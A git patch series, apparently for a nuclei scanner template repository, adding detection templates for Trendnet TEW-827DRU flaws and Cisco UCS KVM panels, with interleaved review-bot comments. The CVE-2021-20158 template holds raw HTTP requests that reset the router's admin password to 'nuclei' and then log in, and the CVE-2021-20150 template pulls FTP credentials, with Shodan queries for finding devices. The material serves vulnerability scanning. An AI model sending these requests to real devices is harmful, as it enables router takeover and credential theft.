Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-20150.yaml | 46 +++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 cves/2021/CVE-2021-20150.yaml diff --git a/cves/2021/CVE-2021-20150.yaml b/cves/2021/CVE-2021-20150.yaml new file mode 100644 index 0000000000..abc45e5c1b --- /dev/null +++ b/cves/2021/CVE-2021-20150.yaml 
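Review bot: The new regex `(([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']?` matches every `addEventListener(` call for any event (`click`, `load`, `DOMContentLoaded`), so with the `xss` tag this template will flag virtually every modern page, whereas the cited reference is specifically about `message` listeners as postMessage sinks. If the goal is the postMessage case, restrict the event name, e.g. `- (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(\s*["']message["']`; if a broad inventory is intended, drop the `xss` tag and say so in `name`/description so consumers do not treat a hit as a finding.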
@@ -0,0 +1,46 @@ +id: CVE-2021-20150 + +info: + name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure + author: gy741 + severity: medium + description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 + - https://www.tenable.com/security/research/tra-2021-54 + tags: cve,cve2021,trendnet,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.30 + cve-id: CVE-2021-20150 + cwe-id: CWE-287 + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/setup_wizard.asp + Cookie: compact_display_state=false + + action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'ftp_username' + - 'ftp_password' + - 'ftp_permission' + condition: and + + - type: word + part: header + words: + - "text/html" From d2e4be88e641d28cc5fc51fd3502c17505440fc7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 01:13:00 +0530 Subject: [PATCH 41/49] Update CVE-2021-20150.yaml --- cves/2021/CVE-2021-20150.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-20150.yaml b/cves/2021/CVE-2021-20150.yaml index abc45e5c1b..cffd81953a 100644 --- a/cves/2021/CVE-2021-20150.yaml +++ b/cves/2021/CVE-2021-20150.yaml 
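Review bot: The `classification` block is internally inconsistent: the vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` computes to 9.8, but `cvss-score: 5.30` and `severity: medium` describe a confidentiality-only issue, so one of them is wrong; an information-disclosure vector such as `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` would agree with 5.3 (please verify against the NVD entry in `reference`). The request also POSTs `action=setup_wizard_cancel` to `/apply_sec.cgi`, which may alter wizard state on the device rather than being a pure read; if so it deserves the `intrusive` tag and a note in `description`.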
@@ -6,14 +6,14 @@ info: severity: medium description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 - https://www.tenable.com/security/research/tra-2021-54 - tags: cve,cve2021,trendnet,disclosure + - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 5.30 cve-id: CVE-2021-20150 cwe-id: CWE-287 + tags: cve,cve2021,trendnet,disclosure,router requests: - raw: @@ -38,9 +38,18 @@ requests: - 'ftp_username' - 'ftp_password' - 'ftp_permission' + - 'TEW-827DRU' condition: and - type: word part: header words: - "text/html" + + extractors: + - type: regex + part: body + name: password + group: 1 + regex: + - '' From f846faa127ab577b507288d6154484cc3ebf3339 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 01:13:30 +0530 Subject: [PATCH 42/49] Update CVE-2021-20150.yaml --- cves/2021/CVE-2021-20150.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-20150.yaml b/cves/2021/CVE-2021-20150.yaml index cffd81953a..28a748db64 100644 --- a/cves/2021/CVE-2021-20150.yaml +++ b/cves/2021/CVE-2021-20150.yaml @@ -13,6 +13,8 @@ info: cvss-score: 5.30 cve-id: CVE-2021-20150 cwe-id: CWE-287 + metadata: + shodan-query: http.html:"TEW-827DRU" tags: cve,cve2021,trendnet,disclosure,router requests: From 9781a16c7f42b67ad30270cb2650a49a73922273 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 01:18:44 +0530 Subject: [PATCH 43/49] Create trendnet-tew827dru-login.yaml --- .../trendnet/trendnet-tew827dru-login.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/trendnet/trendnet-tew827dru-login.yaml 
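Review bot: The new extractor named `password` pulls the plaintext FTP credential out of the response and into scan output, which means it lands in result files, CI logs and any SIEM the output is shipped to; that is a deliberate choice for a disclosure template but should be stated, e.g. a comment `# NOTE: extracts the cleartext FTP password into results — handle output as sensitive`. The extractor's `regex` renders as an empty string in this view, presumably because the `<input ...>` markup was stripped; confirm the committed pattern is non-empty, since an empty regex with `group: 1` will fail rather than extract.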
diff --git a/exposed-panels/trendnet/trendnet-tew827dru-login.yaml b/exposed-panels/trendnet/trendnet-tew827dru-login.yaml new file mode 100644 index 0000000000..c65b44c8b8 --- /dev/null +++ b/exposed-panels/trendnet/trendnet-tew827dru-login.yaml @@ -0,0 +1,25 @@ +id: trendnet-tew827dru-login + +info: + name: TRENDnet TEW-827DRU Login + author: princechaddha + severity: info + metadata: + shodan-query: http.html:"TEW-827DRU" + tags: panel,router,trendnet + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'var model = "TEW-827DRU";' + + - type: status + status: + - 200 From 480dea094b5451b209995c01cbd4f5b70fc04095 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 01:20:39 +0530 Subject: [PATCH 44/49] Update CVE-2021-20150.yaml --- cves/2021/CVE-2021-20150.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/cves/2021/CVE-2021-20150.yaml b/cves/2021/CVE-2021-20150.yaml index 28a748db64..ca4d6b7f51 100644 --- a/cves/2021/CVE-2021-20150.yaml +++ b/cves/2021/CVE-2021-20150.yaml @@ -22,9 +22,6 @@ requests: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - Origin: http://{{Hostname}} - Referer: http://{{Hostname}}/setup_wizard.asp - Cookie: compact_display_state=false action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp From 22618fe6513f2bf511c896712c3907a3e944a96d Mon Sep 17 00:00:00 2001 From: idealphase Date: Fri, 4 Feb 2022 12:09:44 +0700 Subject: [PATCH 45/49] Add cisco-ucs-kvm-direct-login.yaml Add cisco-ucs-kvm-direct-login.yaml --- .../cisco/cisco-ucs-kvm-direct-login.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml diff --git a/exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml b/exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml new file mode 100644 index 0000000000..d4318f76ab --- /dev/null 
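Review bot: PATCH 44 strips the `Origin`, `Referer: http://{{Hostname}}/setup_wizard.asp` and `Cookie` headers from the CVE-2021-20150 request, but the original author included a setup-wizard Referer and the bypass is described as "redirection from the setup wizard", so the CGI may key on that header; whether the trimmed request still works is not shown here. Please confirm against a 2.08B01 device before merging, or keep the `Referer` line and document why it is needed with a short comment above the request body.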
+++ b/exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml @@ -0,0 +1,26 @@ +id: cisco-ucs-kvm-direct-login + +info: + name: Cisco UCS KVM Direct Login + author: idealphase + severity: info + description: The KVM console is an interface accessible from the Cisco UCS Manager GUI or the KVM Launch Manager that emulates a direct KVM connection. Unlike the KVM dongle, which requires you to be physically connected to the server, the KVM console allows you to connect to the server from a remote location across the network. + reference: https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-manager/GUI-User-Guides/Admin-Management/3-1/b_Cisco_UCS_Admin_Mgmt_Guide_3_1/b_Cisco_UCSM_GUI_Admin_Mgmt_Guide_3_1_chapter_01111.html + tags: panel,cisco + metadata: + shodan-query: 'http.title:"Cisco UCS KVM Direct"' + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Cisco UCS KVM Direct' + + - type: status + status: + - 200 From fcc39f52ee775355d9d199d17b77817de0a6ccd4 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 5 Feb 2022 01:29:16 +0900 Subject: [PATCH 46/49] Create CVE-2021-20158.yaml Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-20158.yaml | 59 +++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 cves/2021/CVE-2021-20158.yaml diff --git a/cves/2021/CVE-2021-20158.yaml b/cves/2021/CVE-2021-20158.yaml new file mode 100644 index 0000000000..85c33d0745 --- /dev/null +++ b/cves/2021/CVE-2021-20158.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2021-20158 + +info: + name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change + author: gy741 + severity: critical + description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command. + reference: + - https://www.tenable.com/security/research/tra-2021-54 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-20158 + cwe-id: CWE-287 + metadata: + shodan-query: http.html:"TEW-827DRU" + tags: cve,cve2021,trendnet,disclosure,router + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + + ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei + + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + + html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'setConnectDevice' + - 'setInternet' + - 'setWlanSSID' + - 'TEW-827DRU' + condition: and + + - type: word + part: header + words: + - "text/html" + + extractors: + - type: regex + part: body + name: password + group: 1 + regex: + - '' From 685495df9137b5704fc1f639ebfcc428b80d5132 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 23:31:10 +0530 Subject: [PATCH 47/49] Update CVE-2021-20158.yaml --- cves/2021/CVE-2021-20158.yaml | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/cves/2021/CVE-2021-20158.yaml b/cves/2021/CVE-2021-20158.yaml index 85c33d0745..72e4abc9a3 100644 --- a/cves/2021/CVE-2021-20158.yaml 
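Review bot: This template is destructive: the first request sets `admin_password=nuclei` on the target and the second logs in with the base64 `admin`/`nuclei` pair, yet the tags are `cve,cve2021,trendnet,disclosure,router` with no `intrusive` marker and the description never says the device's admin password will be overwritten; add `intrusive` and a sentence such as `This template CHANGES the router admin password to "nuclei"; run only with authorization.` As written the second `POST` is not its own `- |` item, so it is part of the first request's body rather than a separate request, which would make the login step never execute. The NVD link `https://nvd.nist.gov/vuln/detail/CVE-2021-20150` points at the sibling CVE rather than CVE-2021-20158, and the `disclosure` tag does not describe an unauthenticated credential reset.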
+++ b/cves/2021/CVE-2021-20158.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-287 metadata: shodan-query: http.html:"TEW-827DRU" - tags: cve,cve2021,trendnet,disclosure,router + tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos requests: - raw: @@ -24,7 +24,7 @@ requests: Host: {{Hostname}} ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei - + - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} @@ -49,11 +49,3 @@ requests: part: header words: - "text/html" - - extractors: - - type: regex - part: body - name: password - group: 1 - regex: - - '' From 00eca9b8777b17e983cb5ffbd202598c7c72ca93 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 23:45:48 +0530 Subject: [PATCH 48/49] Update addeventlistener-detect.yaml --- miscellaneous/addeventlistener-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/miscellaneous/addeventlistener-detect.yaml b/miscellaneous/addeventlistener-detect.yaml index c1bc920d1c..2d66e25559 100644 --- a/miscellaneous/addeventlistener-detect.yaml +++ b/miscellaneous/addeventlistener-detect.yaml @@ -2,7 +2,7 @@ id: addeventlistener-detect info: name: DOM EventListener detection - author: yavolo, dwisiswant0 + author: yavolo,dwisiswant0 severity: info tags: xss,misc reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source @@ -16,4 +16,4 @@ requests: - type: regex part: body regex: - - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 \ No newline at end of file + - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 From 9a3975a9926ebd08faa9a247e3dc68330c99e7c3 Mon Sep 17 00:00:00 2001 
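Review bot: The `dos` tag added here mislabels the impact: the template performs an unauthenticated admin-password reset followed by a login, i.e. account takeover, not denial of service, so `tags: cve,cve2021,trendnet,router,intrusive,auth-bypass` (or similar) would route it correctly. Splitting the login into its own `- |` item fixes the request structure, but the description still does not warn that the target's admin password is overwritten with `nuclei`; that warning belongs in `description` since the `intrusive` tag alone is easy to miss. The NVD reference pointing at CVE-2021-20150 sits outside this hunk and is still wrong.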
From: Prince Chaddha Date: Fri, 4 Feb 2022 23:52:34 +0530 Subject: [PATCH 49/49] Update and rename cisco-ucs-kvm-direct-login.yaml to cisco-ucs-kvm-login.yaml --- ...-ucs-kvm-direct-login.yaml => cisco-ucs-kvm-login.yaml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename exposed-panels/cisco/{cisco-ucs-kvm-direct-login.yaml => cisco-ucs-kvm-login.yaml} (90%) diff --git a/exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml b/exposed-panels/cisco/cisco-ucs-kvm-login.yaml similarity index 90% rename from exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml rename to exposed-panels/cisco/cisco-ucs-kvm-login.yaml index d4318f76ab..93aa6618f0 100644 --- a/exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml +++ b/exposed-panels/cisco/cisco-ucs-kvm-login.yaml @@ -1,14 +1,14 @@ -id: cisco-ucs-kvm-direct-login +id: cisco-ucs-kvm-login info: - name: Cisco UCS KVM Direct Login + name: Cisco UCS KVM Login author: idealphase severity: info description: The KVM console is an interface accessible from the Cisco UCS Manager GUI or the KVM Launch Manager that emulates a direct KVM connection. Unlike the KVM dongle, which requires you to be physically connected to the server, the KVM console allows you to connect to the server from a remote location across the network. reference: https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-manager/GUI-User-Guides/Admin-Management/3-1/b_Cisco_UCS_Admin_Mgmt_Guide_3_1/b_Cisco_UCSM_GUI_Admin_Mgmt_Guide_3_1_chapter_01111.html - tags: panel,cisco metadata: shodan-query: 'http.title:"Cisco UCS KVM Direct"' + tags: panel,cisco,ucs,kvm requests: - method: GET @@ -18,6 +18,7 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - 'Cisco UCS KVM Direct'